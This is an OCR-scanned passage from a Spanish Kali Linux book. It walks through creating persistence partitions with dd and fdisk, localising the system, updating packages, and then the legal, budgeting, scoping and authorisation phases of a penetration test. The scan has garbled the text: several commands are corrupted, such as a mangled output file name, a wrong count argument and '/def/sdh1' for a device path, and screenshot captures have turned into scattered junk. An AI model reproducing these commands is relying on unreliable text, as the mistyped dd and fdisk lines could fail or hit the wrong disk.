Es importante que entendamos que una Kali con persistencia se puede 
instalar perfectamente en un disco duro de un ordenador. Porque sea una Kali con 
persistencia no significa necesariamente que se tenga que utilizar desde USB o desde 
DVD; ya que podemos tener la ISO de Kali volcada en un disco del ordenador. 
Aunque lo normal es que tengamos Kali en un USB, y luego utilicemos el disco u 
otro USB como partición de persistencia. 


Personalmente yo utilizo la Kali en persistencia habitualmente, dado que 
utilizo con mucha frecuencia el modo forense. Mi instalación es que siempre llevo 
cuando voy a cliente dos llaveros USB baratos, uno con la 1386 en persistente, y otro 
con la amd64 en persistente, así como el DVD de Kali i386 y el DVD de Kali amd64 
en persistente. 


En el portátil que tengo instalado la Kali, tengo solo la partición persistente 
en el propio portátil, y la Kali separada en un llavero USB. Podría tener también la 
de Kali, pero por motivos laborales viajo bastante, y algunas herramientas de Kali 
no están muy bien vistas en algunas jurisdiciones. Prefiero no arriesgarme, y llevar 
la Kali en un llavero USB, de forma que no aparezca lo de "Kali" al encender el 
portátil y no tener que dar más explicaciones de las estrictamente necesarias a las 
policías aeroportuarias. Si te solicitan encender el portátil y dar tu clave, en todas las 
jurisdisciones que conozco debes hacerlo -luego, igual en alguna puedes reclamar, 
y hasta en alguna jurisdicción puede que te den la razón. Pero yo no contaría con 
ello-. Es importante entender que la criptografía fuerte es ilegal en muchas partes del 
mundo; que paises como Espana tienen restricciones a la importación y la exportación 
de la criptografía, que las herramientas para atacar sistemas son ilegales en muchas 
jurisdicciones, como la espanola; y que lo normal es que la policía aeroportuaria 
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pueda solicitar revisar el contenido de tu portátil si lo estima procedente, sin 
autorización judicial. Por regla general, es más cómodo pasar el portátil con una 
partición de persistencia sin cifrar, y cuando lleguemos a nuestro destino descargar 
una nueva ISO de Kali. 


Para instalar una Kali en persistencia, lo debemos hacer desde un Linux ya 
preexistente. Aunque estécnicamente posible hacerlo desde otros sistemas operativos, 
los pasos serán distintos de los aquí descritos. Si no trabajamos habitualmente sobre 
Linux, podemos arrancar desde Kali, hacer los pasos que indicamos en este libro, y 
reiniciar ya en modo persistencia. 


1.5.2 Creando una partición de persistencia 


1.5.2.1 CREACIÓN DE UNA PARTICIÓN DE PERSISTENCIA PARA EJECUCIÓN 
VIRTUALIZADA DE KALI 


Este es el escenario que recomiendo para practicar y aprender a utilizar Kali; 
también el escenario para hacer pruebas con Kali sobre una máquina arbitraria, sea 
Linux o Windows. 


Lo primero es crear el disco donde vamos a instalar la partición virtualizada. 
Esto lo podemos hacer habitualmente desde la propia herramienta de virtualización, 
creando un disco adicional. El disco debe tener más de 8 GB, y es recomendable que 
tenga 16 GB. 


Si la herramienta de virtualización no dispone de mecanismo para crear 
discos duros virtualizados, o queremos hacerlo "a mano", creamos el disco con: 


dd if=/dev/zero of=imagenpersistencia.img bs=1M  count-tam 


Donde imagenpersistencia.img es el nombre que le queremos dar a la 
imagen de persistencia -da igual cual sea, mientras seamos consistentes- y tam es el 
tamano en megabytes de la imagen de persistencia. Por ejemplo, para una imagen de 
persistencia de 8 GB, hacemos: 


if=/dev/zero ofzimagenpersistencia.img bs=1M count 28192 


De momento, hemos creado el disco, no la partición. Ahora vamos a 
particionarlo. Entramos en el disco, con fdisk: 


fdisk imagenpersistencia.img 
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Obteniendo: 


GNU Fdisk 1.2.4 

Copyright (C) 1998 - 2006 Free Software Foundation, Inc. 

This program is free software, covered by the GNU General Public License. 

This program is distributed in the hope that it will be useful, but WITHOUT ANY 
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR 
A PARTICULAR PURPOSE. See the 

GNU General Public License for more details. 

Device contains neither a valid DOS partition table, nor Sun, SGI or OSF disklabel 
Building a new DOS disklabel. Changes will remain in memory only, 

until you decide to write them. After that, of course, the previous 

content won't be recoverable. 

Using /local/vms/Kali2017.2.persistencia/imagenpersistencia.img 

Command (m for help): 


Creamos una nueva partición con n: 


Partition type 
extended 
primary partition (1-4) 


Queremos una partición primaria, por lo que pulsamos p, obteniendo: 


First cylinder (default Ocyl): 


Ahora nos está pidiendo el primer bloque de la partición nueva; como 
queremos destinar el archivo completo a imagen de persistencia, pulsamos "Enter", 
obteniendo: 


Last cylinder or +size or *sizeMB or *sizeKB (default 
131071cyl): 


Ahora nos pregunta por el ültimo bloque. No nos debe preocupar que el 
nümero de cilindro salga disparatado, es normal en las imágenes en fichero. Si 
pulsamos “Enter”, tomará el ultimo bloque del disco; que es precisamente lo que 
queremos. Aparece después: 


Command (m for help): 


Verificamos que todo ha funcionado correctamente pulsando otra vez p, y 
obtenemos: 
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Disk /local/vms/Kali2017.2.persistencia/imagenpersistencia.img: 8 GB, 8589934592 bytes 
4 heads, 32 sectors/track, 131072 cylinders Units - 
cylinders of 128,512 = 65536 bytes 


Device Boot Start End Blocks Id System 
imagenpersistencia.img1 1 131072 8388592 83 Linux 
Command (m for help): 


Para salir grabando lo que hemos hecho, pulsamos w; la salida será algo 
como: 


Writing all changes to /local/vms/Kali2017.2.persistencia/imagenpersistencia.img. 


1.5.2.2 CREANDO UNA PARTICIÓN DE PERSISTENCIA PARA EJECUCIÓN NATIVA 
EN EL PROPIO LLAVERO USB DE LA KALI 


En el caso de que queramos crear una partición de persistencia para ejecución 
nativa desde un llavero USB con Kali, necesitamos un llavero USB con mucho 
espacio -16 GB o más-. Con 8 GB se puede hacer para pruebas, aunque queda algo 
justo cuando trabajemos con Kali de forma continua. 


Primero volcamos la imagen de Kali en la unidad en la que queramos que 
se instale -ojo, sobrescribiremos el contenido de la unidad y perderemos lo que 
tuviéramos-. Esto lo hacemos con: 


dd if=imagen.iso of=dispositivo bs=1M 


Donde imagen.iso corresponde con la imagen ISO que queremos instalar, y 
que habremos descargado mediante uno de los pasos explicados con anterioridad; 
y dispositivo corresponde con el dispositivo en el que pretendemos instalar. Si la 
imagen que queremos instalar es kali-linux-2017.2-amd64.iso y el dispositivo el 
/dev/sdc, por ejemplo, hacemos: 


dd if=kali-linux-2017.2-amd64.iso of=/dev/sdc bs=1M 


Ojo, dispositivo completo, no partición; por lo que al hacer esto 
sobrescribiremos la tabla de particiones, y nos "cargaremos" todo lo que hubiera en 
el disco. dispositivo puede ser un disco duro, una partición o un fichero. 


Ahora creamos la partición de persistencia. Para crear la partición de 
persistencia, lo siguiente será entrar en la partición con fdisk o parted -a nuestra 
preferencia-; y creamos una tercera partición con el espacio que queramos emplear 
para la partición de persistencia— que almacenará nuestros datos, y las modificaciones 
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а los ficheros de la imagen live—. Por ejemplo, si estamos trabajando con el dispositivo 
y queremos utilizar fdisk, haríamos: 


fdisk dispositivo 


Si utilizamos, por ejemplo, /dev/sdi, porque no vamos a trabajar en un 
sistema virtualizado, haremos: 


fdisk /dev/sdi 
Aparecerá algo similar a lo siguiente: 


GNU Fdisk 1.2.4 

Copyright (C) 1998 - 2006 Free Software Foundation, Inc. This program 
is free software, covered by the GNU General Public License. 

This program is distributed in the hope that it will be useful, 

but WITHOUT ANY WARRANTY; without even the implied warranty of 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 
GNU General Public License for more details. 

Using /dev/sdi 

Command (m for help): 


Lo primero que debemos hacer es ver dónde termina la última de las 
particiones de la distribución Live que está en la imagen; lo que hacemos con p; 
resultando en nuestro ejemplo: 


Disk /dev/sdi: 8 GB, 8178892800 bytes 
64 heads, 32 sectors/track, 7800 cylinders Units = 
cylinders of 2048 , 512 = 1048576 bytes 


Device Boot 
System Start End Blocks Id 
[dev/sdi1 
* Hidd HPFS/NTFS 1 2830 2897904 17 


Warning: Partition 1 does not end on cylinder boundary. 
/dev/sdi2 2830 2935 107520 1 FAT12 
Warning: Partition 2 does not end on cylinder boundary. 


Aquí nos tenemos que fijar en el bloque final de la segunda partición, que 
sería el 2935; luego el bloque libre siguiente es el 2936. Creamos una partición 
nueva, lo que hacemos con n, resultando en nuestro ejemplo: 
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Partition type 
e extended 
p primary partition (1-4) 


Queremos una partición primaria, por lo que pulsamos p, obteniendo: 


First cylinder (default Ocyl): 


Ahora nos está pidiendo el primer bloque de la partición nueva, que tiene que 


ser el inmediatamente posterior al ultimo de la ultima partición -en nuestro ejemplo, 
2936-; por lo que tecleamos el numero requerido, y pulsamos "Enter", obteniendo: 


Last cylinder or +size or *sizeMB or +sizeKB (default 
7799cyl): 


Ahora nos pregunta por el ultimo bloque. Si pulsamos "Enter", tomará el 


ültimo bloque del disco. 


Command (m for help): 


Verificamos que todo ha funcionado correctamente pulsando otra vez p, y 


obtenemos: 


como: 


Disk /dev/sdi: 8 GB, 8178892800 bytes 
64 heads, 32 sectors/track, 7800 cylinders Units = 
cylinders of 2048, 512 = 1048576 bytes 


Device Boot 
System Start End Blocks Id 
/dev/sdil 
onan ESSE 1 2830 2897904 17 
Warning: Partition 1 does not end on cylinder boundary. 
/dev/sdi2 2830 2935 107520 1 
FAT12 
Warning: Partition 2 does not end on cylinder boundary. 
/dev/sdi3 2936 7800 4980736 83 
Linux 


Para salir grabando lo que hemos hecho, pulsamos w; la salida será algo 


Writing all changes to /dev/sdi 
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1.5.2.3 CREANDO UNA PARTICIÓN DE PERSISTENCIA PARA EJECUCIÓN NATIVA 
EN UN DISCO FISICO 


Aquí no tendremos demasiado problema. Basta con crear la partición en el 
volumen que queramos, con nuestra herramienta de particionado favorita; y pasar al 
siguiente paso. 


1.5.3 Configurando la partición de persistencia 


Para configurar la partición de persistencia, arrancamos desde Kali; y así 
ya podemos utilizar independientemente de cómo hayamos llegado hasta aquí 
comandos análogos. 


Reiniciamos la máquina utilizando como imagen o partición de arranque 
dónde el DVD o el USB de Kali -no la pantalla de persistencia, sino Kali en sí-, 
obteniendo esta pantalla: 


зоће quieter you become, the More you are able to hear” 


Boot menu 


Live (amd64) 

Live Саміб4 failsafc) 

Live (forensic mode) 

Live USB Persistence (check kali.org/prst) 
Live USB Encrypted Persistence (check kali.org/prst) 
Install 

Graphical install 

Install with speech synthesis 

Advanced options 





Arrancamos en modo Live, y abrimos una consola de texto. 


Seleccionamos Live USB Persistence, y entraremos en una Kali perfectamente 
funcional, pero en inglés. El siguiente paso será pasar Kali a espanol. Para hacerlo, 
abrimos una consola de texto -segundo icono en la columna de la izquierda, contando 
desde arriba-. El siguiente paso será formatear la partición de persistencia con ext3. 
Suponiendo que la tenemos en /dev/sdh1, por ejemplo, lo hacemos con: 
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mkfs.ext3 -L persistence /dev/sdh1 

Si no le hemos puesto antes la etiqueta "persistence", se la ponemos: 
e2label /def/sdh1 persistence 

Finalmente, creamos el fichero de configuración del sistema de ficheros: 


mount /def/sdh1 /mnt 
echo "/ union" > /mnt/persistence.conf umount /mnt 


1.5.4 Configurando el sistema Kali con la partición de persistencia 


Reiniciamos otra vez, y arrancamos otra vez desde dónde tenemos Kali 
instalada: 


the quieter you become, the more you are able to hear” 


Boot menu 


Live (amd64) 

Live (amd64 failsafe) 

Live (forensic mode) 

Live USB Persistence (check kali.org/prst) 
Live USB Encrypted Persistence (check kali.org/prst) 
Install 

Graphical install 

Install with speech synthesis 

Advanced options 





Seleccionamos Live USB Persistence, y entraremos en una Kali 
perfectamente funcional, pero en inglés. El siguiente paso serd pasar Kali a espanol. 
Para hacerlo, abrimos una consola de texto -segundo icono en la columna de la 
izquierda, contando desde arriba-. Abierta la consola, hacemos: 


dpkg-reconfigure locales 


Seleccionamos los locales en espanol con soporte UTF8: 
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Applications = Places + [E] Terminal + Sat 20:05 È 


root@kali: ~ 


File Edit View Search Terminal Help 


guration 








| Configuring locales + 
Locales are a framework to switch between multiple Languages and allow 
users to use their Language, country, characters, collation order, etc. 


Please choose which locales to generate. UTF-B locales should be chosen 
by default, particularly for new installations. Other character sets may 
be useful for backwards compatibility with older systems and software. 


Locales to be generated: 

















En esta captura vemos que en segundo plano he comenzado a actualizar 
repositorios y paquetes. Es muy recomendable que hagamos ambas operaciones; lo 
que ya hemos visto cómo hacerlo en el apartado anterior. 


Después de dar al Ok, seleccionamos como locale; que por defecto será 
es ES.UTF-8: 


Applications Places v EJ Terminal + 
root@kali; ~ 
File Edit View Search Terminal Help 
age configuration 
Configuring locales |- 
Many packages in Debian use locales to display text in the correct 


language for the user. You can choose а default locale for the system 
from the generated locales. 


This will select the default language for the entire system. If this 
system is a multi-user system where not all users are able to speak the 
default language, they will experience difficulties. 


Default locale for the system environment: 


None 


C.UTF-8 
en US.UTF-8 
TF 


«cancel» 





J non- 

g/main amd 

g/contrib am 

g/non-frae amd64 " [145 КВ] 
4 kB/s As 
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Con eso hemos terminado la configuración de línea de comandos. La del 
interfaz gráfico va por otro lado. Seleccionamos el icono más a la derecha de la 
barra superior -el de apagado-, y seleccionamos en la parte baja izquierda del menu 
desplegado el destornillador y la llave inglesa cruzadas: 


Sat 20:07 


Wired Connected 


Proxy None 





Y seleccionamos en la parte baja izquierda del menu desplegado el 
destornillador y la llave inglesa cruzadas; entrando así en la pantalla de configuración: 


All Settings 
Background Notifications Online Privacy Region & 
Accounts Language 


Hardware 


0 © 8: q 


Bluetooth Displays Mouse & Network 


O +=. «am 


Power Printers Sound Wacom Tablet 


Touchpad 


System 


© © 3G i O 


Date & Time Sharing Universal Users 
Access 
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Seleccionamos el icono Region & Language, y cambiamos Language por 
“Espanol” y Formats por “Espana”: 





Español (España) 


España (Español) 





Finalmente solo falta cambiar la fuente de entrada a teclado español, y 
que este sea el teclado por defecto. Seleccionamos el símbolo + que vemos en el 
cuadro de Input Sources abajo a la izquierda, y se nos despliega el menú de teclados; 
seleccionamos el idioma español: 


Cancel | Add an Input Source | Add 


Arabic (Egypt) 
Chinese (China) 
English (United Kingdom) 
English (United States) 
French (France) 
German (Germany) 
Japanese 
Russian (Russian Federation) 


Spanish (Spain) 





Dentro del idioma español, seleccionamos el tipo de teclado español 
que tenemos -si no estamos seguros de cual es, seleccionamos el primero de los 
ofrecidos-: 
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| Cancel Add an Input Source 


< Spanish (Spain) 


Spanish (Dvorak) 


Spanish (Latin American) 

Spanish (Latin American, Dvorak) 

Spanish (Latin American, Sun dead keys) 
Spanish (Latin American, eliminate dead keys) 
Spanish (Latin American, include dead tilde) 
Spanish (Macintosh) 

Spanish (Sun dead keys) 





Finalmente, subimos la prioridad del teclado espanol seleccionando el 
teclado espanol del menu Input sources, y pulsando el botón ^ que aparece abajo en 
el centro del susodicho menu: 


Region & Language 





Espafiol (Espafia) 
España (Español) 


English (US) 


Lel= 





Y con esto, ya tenemos perfectamente configurada nuestra Kali en 
persistencia, a falta de actualizar repositorios y paquetes; lo que no repetiremos 
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cómo se hace, ya que la operativa es exactamente la misma que la comentada en el 
punto anterior de actualización para una instalación limpia de Kali. 


Además de todo esto, Kali soporta particiones persistentes cifradas, múltiples 
particiones persistentes, y particiones persistentes cifradas con autodestrucción - 
si tecleas una clave que decidas en lugar de la clave real, Kali borra la partición 
persistente completa-. No cubriremos estos aspectos por razones de tiempo; aunque 
encontraremos un tutorial para configurar estas opciones en la web: 


http://docs.kali.org/kali-dojo/03-kali-linux-usb- persistence-encryption 


1.6 PRIMER PASEO POR KALI 


Si hemos seguido los pasos anteriores, tras el reinicio de la máquina, 
encontraremos algo como esto en la pantalla de arranque de Grub: 


GNU GRUB versión 2.02^beta2-36 


*Kali GNU/Linux 
Opciones avanzadas para-Kali-GNL/L inux 
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Seleccionamos Kali y veremos la pantalla de login cuando termine el 
arranque. Si vemos algo como esto... 





..@S que hemos dejado pasar más tiempo de la cuenta; es un protector de 
pantalla, del que salimos pulsando el retorno de carro. 


Independientemente de que hayamos creado un usuario sin privilegios de 
superusuario, estas primeras operaciones con Kali utilizaremos como nombre de 
usuario root: 


Siguiente 
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Tecleamos la clave que hemos definido como clave de root —ecordando que 
si utilizamos la Kali live o la instalación de persistencia, la clave por defecto es toor-: 


Iniciar sesión 
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En la esquina superior izquierda tenemos un desplegable con las aplicaciones 
que Kali dispone, organizadas por fase dentro de la intrusión. En la columna de 
la izquierda tenemos las aplicaciones que son de uso más comün. La primera es 
el navegador iceweasel, un clon de Debian del navegador firefox. La siguiente, de 
arriba a abajo es la consola de texto. Después el gestor de archivos, Metasploit, 
Armitage, y asi hasta completar una serie de aplicaciones y utilidades de uso común. 


Metasploit va a ser una herramienta clave, ya que desde Metasploit podemos 
hacer muchas operaciones forenses. Podemos utilizarlo desde línea de comandos, o 
desde interfaces gráficos —como puede ser Armitage-Hablaremos de Metasploit con 
más tranquilidad más adelante durante nuestro libro. 


1.7 ACTUALIZANDO LOS PAQUETES DE KALI 


Es muy recomendable una vez que hemos instalado Kali, hacer una 
actualización de paquetes. Para hacer esto, abrimos una consola de texto -segundo 
icono de la barra izquierda, contando desde arriba- y hacemos: 


apt-get update 
Esto actualiza los repositorios. Veremos algo como: 


Aplicaciones ~ Lugares = E] Terminal ~ 


root@ kali: ~ 
Archivo Editar Ver Buscar Terminal Ayuda 
apt-get update 
Obj:1 ht archive-4.kali.org/kali kali-rolling InRelease 
Leyendo de paquetes... Hecho 


c 


[ 


a 
м 
© 
x 


x B 
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Después de esto, actualizamos los paquetes, lo que hacemos con: 
apt-get upgrade 


Obteniendo una pantalla como: 


Aplicaciones y 


root@kali: ~ 
Archivo Editar Ver Buscar Terminal Ayuda 


me Libmtp9 libno 4 Libnss-myhostname 
ibosmes: Libpam-systemd Lib go-1.0-8 
ibpant ð libpar airo-1.0-8 libpangoft2-1.0-60 pangoxft-1.8-6 
ibpli admath& li 1.1 Libradare2- common 
libradar v libsane libs T bcl libserf-1-1 libsodiuml8 
dev libs й 1 


gresql-client-common 
С rver python-apt-common python-cairo 
y forme pat n-pas hon-tornado 
pt python3-reportbi ada ai n-ng reportbug 
sane-utils set smbmap sqlmap ssl-cer S d te 
udev ur 


g-inpu 
eo-nouveau xxd 
Ө para eliminar y 4 no actualizados. 
vos 
adicional después de esta operacion 





Ahora decimos que si pulsando “Enter”, y a esperar un buen rato. Nos hard 
algunas preguntas de instalación de paquetes; es recomendable que de momento 
utilicemos siempre las opciones por defecto. 





KALI PARA TESTS DE INTRUSIÓN. 
FASES DE UN TEST DE INTRUSION 


2.1 CONCEPTOS PREVIOS 


Antes de entrar en cómo utilizar Kali para realizar un test de intrusión, vamos 
a ver cómo hacer un test de intrusión sin buscarnos problemas legales innecesarios; 
debemos recordar que un test de intrusión no solicitado o autorizado es, de por sí, 
delictivo. 


Un test de intrusión, test de penetración, o penetration test, o pentest, es 
un procedimiento de auditoría de seguridad activa en el que con autorización del 
propietario de un sistema de información, el auditor de seguridad analiza el susodicho 
sistema buscando de forma proactiva agujeros de seguridad vulnerables. El test de 
intrusión puede terminar al encontrar una vulnerabilidad, aunque solo sea explotable 
teóricamente; puede precisar el desarrollo de una prueba de concepto para validar 
que la vulnerabilidad encontrada es explotada, o puede incluso llegar a requerir que 
se demuestre la vulneración llegando a explotar la vulnerabilidad. 


El test de intrusión no está enfocado a una máquina, sino a un sistema de 
información concreto. Esto involucra los servidores, los ordenadores de sobremesa 
y el software de sistemas. Pero -y esto se olvida con frecuencia-, involucra también 
al personal, a las mecánicas y los procedimientos de la empresa, y a la gestión de 
la información en su sentido más amplio. Esto quiere decir que un test de intrusión 
puede ser realmente realizado mediante técnicas de ingeniería social, o mediante 
cualquier otra técnica que no sea necesariamente tecnológica. 
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A diferencia de los escaneos automatizados, que son indiscriminados, el test 
de intrusión requiere un análisis previo de los sistemas de información de un cliente. 
Esto supone que es muy importante recoger información del cliente, analizarla, y 
antes de comenzar a trabajar ya tener una idea clara de las vulnerabilidades. Los 
tests de intrusión son especialmente ütiles si se realizan después de una auditoría 
de seguridad de la familia de normas ISO/IEC 27000; ya que al terminarla, el 
auditor tiene una idea muy clara de cómo funciona un sistema, de dónde están 
sus vulnerabilidades, y aunque estrictamente hablando se haya pasado la norma 
ISO/IEC 27001, el auditor puede deducir a partir de la información extraída cómo 
atacaría el sistema, y hasta dónde podría llegar en caso de proceder al ataque. El test de 
intrusión, en este escenario, no dejaría de ser la validación empírica de lo encontrado 
después de un auditoría previa de seguridad. Recordemos que la familia de normas 
ISO/IEC 27000 se centra en procedimientos: podemos tener un sistema que pase 
la ISO/IEC 27001 y que tenga vulnerabilidades que sean verificables a través de 
tests de intrusión; y podemos tener un sistema que, sin pasar la ISO/TEC 27001, no 
tenga vulnerabilidades. Son, pues, análisis complementarios que se pueden realizar 
en el mismo pedido del cliente; en cuyo caso es recomendable realizar primero la 
auditoría completa ISO/TEC 27001: desaparecerán las vulnerabilidades de proceso, 
y obtendremos mucha información que nos permitirá como auditores ir directamente 
a por las vulneraciones de software, servidores y redes. 


Algo muy importante que nunca se destaca en exceso es que un test de intrusión 
es un tema que legalmente es delicado, y es fácil realizar actos delictivos de buena 
fe. Hay que tener en cuenta que, a diferencia de una auditoría de seguridad comün 
en la que se valida el cumplimiento de una norma a partir de pruebas documentales 
y de la observación directa con el beneplácito y delante del observado, un test de 
intrusión no deja de ser una validación de la seguridad a partir de la ruptura de esta. 
Y las rupturas de la seguridad en sistemas informáticos son de entrada ilegales en 
nuestro ordenamiento jurídico. Aunque lo podamos considerar como "emocionante", 
realizar tests de intrusión es legalmente delicado, y en muchos casos es ilegal hasta 
con la aprobación expresa y explícita de la propiedad. 


Cuando hablamos de "propiedad", nos referimos al dueno de la empresa, 
persona o personas con el nivel máximo ejecutivo. Hay que tener cuidado de que 
el que nos contrate pueda legalmente autorizarnos para realizar una intrusión: nos 
podemos ver en el caso de que nos contrate alguien que oficialmente sea "director de 
sistemas", y que no tenga autorización real para permitir una intrusión. 


También hemos de tener en cuenta que por mucho que la propiedad nos 
autorice que hagamos algo con su sistema de información, eso no significa que sea 
legal: de entrada, no podemos leer correos electrónicos, y no podemos intervenir 
comunicaciones. En el caso de sistemas tipo cloud o en los que se haya alquilado 
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una máquina virtual o una máquina física a un proveedor, es posible que muchas de 
las cosas que podamos hacer no supongan intromisión en los sistemas de nuestro 
cliente, sino en los del proveedor de nuestro cliente, lo que es delictivo. Además, 
algunas operaciones concretas de la mecánica de los tests de intrusión pueden ser 
delictivas en algunas jurisdicciones legales. 


Aunque el planteamiento de las fases es lineal, es importante que tengamos 
claro que en cualquier momento podemos volver a fases anteriores. Por ejemplo, 
al redactar el alcance y las condiciones del test de intrusión podemos descubrir 
que realmente tenemos que hacer cosas distintas de las presupuestadas, y ajustar el 
presupuesto acorde a ello. Al realizar las validaciones legales, puede que tengamos 
que reducir el alcance o alterar las condiciones de los tests de intrusión, lo que 
probablemente cambie los permisos que necesitamos. Al recoger la información 
podemos descubrir cosas del sistema que desconocíamos -especialmente si 
no hemos auditado el sistema respecto a la norma con anterioridad-, lo que nos 
obliga a analizar la legalidad de hacer pentesting sobre lo descubierto, cambiar 
el alcance y las condiciones del test, y probablemente pedir nuevos permisos. Al 
analizar las vulnerabilidades podemos obtener información nueva que nos obligue 
a rehacer pasos anteriores, y al explotar las vulnerabilidades podemos encontrar 
vulnerabilidades nuevas que requieran análisis y los pasos anteriores. Finalmente, 
al presentar los resultados a la propiedad esta nos puede solicitar ampliar el ámbito 
inicialmente contratado, y al formar a los trabajadores podemos detectar asuntos 
que requieran ser comunicados a la propiedad. Debemos interpretar, por lo tanto, 
las fases principalmente en el contexto de que unas cosas van antes que otras, y que 
todas las fases las tendremos que cubrir. Habitualmente, algunas fases más de una 
Vez. 


2.2 FASE CERO: EMISION DE PRESUPUESTO, ACUERDO EN LOS OBJETIVOS, Y 
EMISION DE PROFORMAS INICIALES 


Huelga decir que, como actividad profesional, comenzaremos emitiendo 
un presupuesto. Ese presupuesto debe indicar qué objetivos se pretende cubrir, qué 
pruebas se pretenden realizar, sobre qué máquinas y durante cuanto tiempo. Es 
importante que seamos todos lo explícitos que podamos: por un lado, si tenemos 
que revisar el presupuesto porque el ámbito de trabajo sufre alteraciones podemos 
justificarlo. En segundo lugar, nada dice más claro que se nos ha contratado un 
servicio y que no lo estamos haciendo en contra de la opinión y los intereses de la 
empresa que una factura pagada. 


Lo normal es que el presupuesto se haga en varias iteraciones, hasta llegar a 
un acuerdo por objetivos. 
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El presupuesto debe contener hitos y entregables. También debe contener 
con detalle, pero sin entrar en un exceso de tecnicismos, qué proponemos hacer, y las 
condiciones que a priori tenemos ambas partes; especialmente respecto a horarios de 
actuación, días de la semana de actuación, rangos de fechas en los que no se puede 
actuar, y numero de visitas presenciales requeridas -esto ultimo es especialmente 
importante si el cliente no está en nuestro municipio-, aunque también es importante 
si el cliente está en nuestro municipio. 


Una vez que se aprueba el presupuesto, se emiten las facturas proforma. 
Nunca se emite una factura por una cantidad que no se ha cobrado; ya que la 
obligación fiscal en Espafia se adquiere por la emisión de la factura, no por el cobro 
de esta. Y podemos ser novatos, hacer un presupuesto de cinco cifras, emitir una 
factura de cinco cifras cerca del final del trimestre, y tener que afrontar el pago 
de un IVA y de un adelanto del IRPF considerable sobre una factura que no ha 
sido abonada. Por una factura de 10000 euros debemos hacer un abono al estado al 
inicio del siguiente trimestre de 3600,00 , y hasta el айо pasado de 4200 -bajaron 
las retenciones justo antes de la convocatoria de elecciones, y es probable, conocido 
el райо, que las vuelvan a subir incluso a más del máximo cuando se les vuelva a 
torcer la recaudación-. Salvo que tengamos 4000 euros líquidos en cuenta por cada 
10000 euros facturados, y no tengamos problemas en deshacernos de ese dinero, es 
recomendable emitir las facturas en el exacto momento en el que el dinero entre en 
la cuenta bancaria. 


Personalmente recomiendo cobrar por hitos; es decir, definir en el presupuesto 
una serie de hitos, y unas cantidades que se emite factura proforma y se cobran 
después de cubierto el hito y entregado el entregable. Esto supone que el presupuesto 
también tiene que definir de forma muy clara qué se considera un entregable y cuales 
son las condiciones de aceptación específicas de los entregables. Es recomendable 
indicar en el presupuesto que hasta que no haya aceptación del entregable y pago del 
hito no se comienza a trabajar en la próxima etapa. Mi experiencia de no hacerlo así 
es extremadamente negativa. Las fechas de compromiso deben ser siempre fechas 
relativas, de duración, establecidas desde la fecha de aceptación del entregable y 
abono del hito. Establecer el compromiso de fechas fijas de entrega supone que la 
presión por atrasos de pagos pasan del cliente a nosotros. 


Es muy recomendable que solicitemos un porcentaje del proyecto por 
adelantado. Eso evita cancelaciones en las que no veamos ni un duro, o que después 
de llevar trabajando un mes, el cliente decide renegociar el contrato subiendo las 
tareas al alza, y las condiciones económicas a la baja, basándose en que o cedes 
о te despides de cobrar el mes trabajado -lo que me ha pasado, y con empresas 
muy respetadas—. Ese porcentaje de proyecto debe ser capaz de financiar el proyecto 
hasta el primer hito con su entregable en el peor caso. Por regla general, el pago del 
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cumplimiento de cualquier hito debe ser capaz de financiar la etapa inmediatamente 
posterior en el peor caso. Esto supone, por un lado, que el ultimo pago va íntegro 
a financiar la actividad comercial del próximo cliente. Por otro lado, supone que 
debemos procurar que los hitos y los entregables estén lo más equiespaciados que 
sea posible, para que al cliente no le produzca disonancia cognitiva que queremos 
cobrar una cantidad grande por un hito cercano. 


2.3 PRIMERA FASE: ALCANCE Y CONDICIONES DEL TEST DE INTRUSION 


Una vez que se abona la primera proforma y se emite la factura relacionada 
con este pago, es el momento de escribir el alcance y las condiciones del test de 
intrusion. 


Debemos entender esta fase no tanto con especificar qué se va a hacer, sino 
cómo se va a hacer. Es decir, como auditores primero debemos detallar y explicar 
prueba a prueba qué pretendemos hacer y cuales son los potenciales resultados de 
estas pruebas, para conseguir lo que hemos propuesto en el presupuesto. Lo normal 
es que el cliente se asuste de lo que le estamos diciendo, y nos ponga restricciones a 
lo que le estamos proponiendo. En base a estas restricciones, la propiedad o nosotros 
podemos poner condiciones adicionales. 


El resultado debe ser muy preciso técnicamente, y debe especificar con 
detalle cómo proponemos realizar el test de intrusión, que resultados esperamos, 
y cuales son las consecuencias en cualquier sentido de lo que hacemos. En caso 
de que haya riesgo de paradas en servicios, de saturación de red, de problemas de 
carga en servidores o de pérdida de tiempo de empleados por alguna razón, debemos 
hacerlo constar, y el cliente lo debe aprobar explícitamente. Es muy importante que 
entendamos que esto nos librará de potenciales demandas por responsabilidad civil si 
el cliente cambia de opinión y el cliente termina disgustado por los efectos laterales 
del test de intrusión. 


Algunas de estas condiciones y restricciones adicionales suponen una bajada 
en nuestro esfuerzo, o en lo que debemos ejecutar finalmente. Otras pueden suponer 
un incremento de nuestro esfuerzo, o en las tareas a realizar. Por ello, definidas 
condiciones y restricciones adicionales, debemos estimar la variación agregada del 
coste. Con frecuencia, los incrementos compensan las reducciones de coste, el coste 
final es aproximadamente el presupuestado, y podemos pasar a la siguiente fase. 
Si vemos que nos hemos disparado hacia arriba o hacia abajo, debemos hacérselo 
constar al cliente, explicarle porqué, y volver a la fase de presupuesto si procede. 
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2.4 SEGUNDA FASE: RECOLECCIÓN INICIAL DE PERMISOS Y AUTORIZACIONES 


Una vez que sabemos qué debemos hacer y cómo queremos hacerlo, y que 
la propiedad ha entendido y aceptado por escrito los efectos, consecuencias y efectos 
laterales del test de intrusión, el siguiente paso es conseguir permiso por escrito 
autorizando a hacer las operaciones especificadas. 


En muchos casos el documento de alcance y condiciones del test de intrusión 
se puede emplear como autorización válida. Sin embargo, a veces hay que recabar 
permisos adicionales. En el caso de que haya empresas subcontratadas, autónomos 
que realizan tareas concretas, aspectos que requieran autorización directa de 
determinados trabajadores porque se puede invadir su esfera de privacidad, sistemas 
de otras empresas -proveedores o clientes- involucrados, o simplemente que se trate 
de una empresa muy grande, que el contrato lo tengamos con un departamento o 
con una sede y que esté involucrado otro departamento u otra sede, será necesario 
la obtención de consentimientos informados de todos los actores de los que sea 
requerido. 


El consentimiento informado es un documento clave, por el que el individuo 
о ente afecto por nuestra actividad auditora -stakeholder, como se diría en jerga 
de gestión empresarial- autoriza determinadas acciones afirmando que ha sido 
convenientemente informado de una serie de potenciales problemas y efectos 
secundarios que se pueden dar. El consentimiento informado debe incluir por extenso 
todos esos efectos, y es buena idea que segreguemos los efectos por probabilidad en 
cinco categorías: 


Y Seguro 

Y Probable 

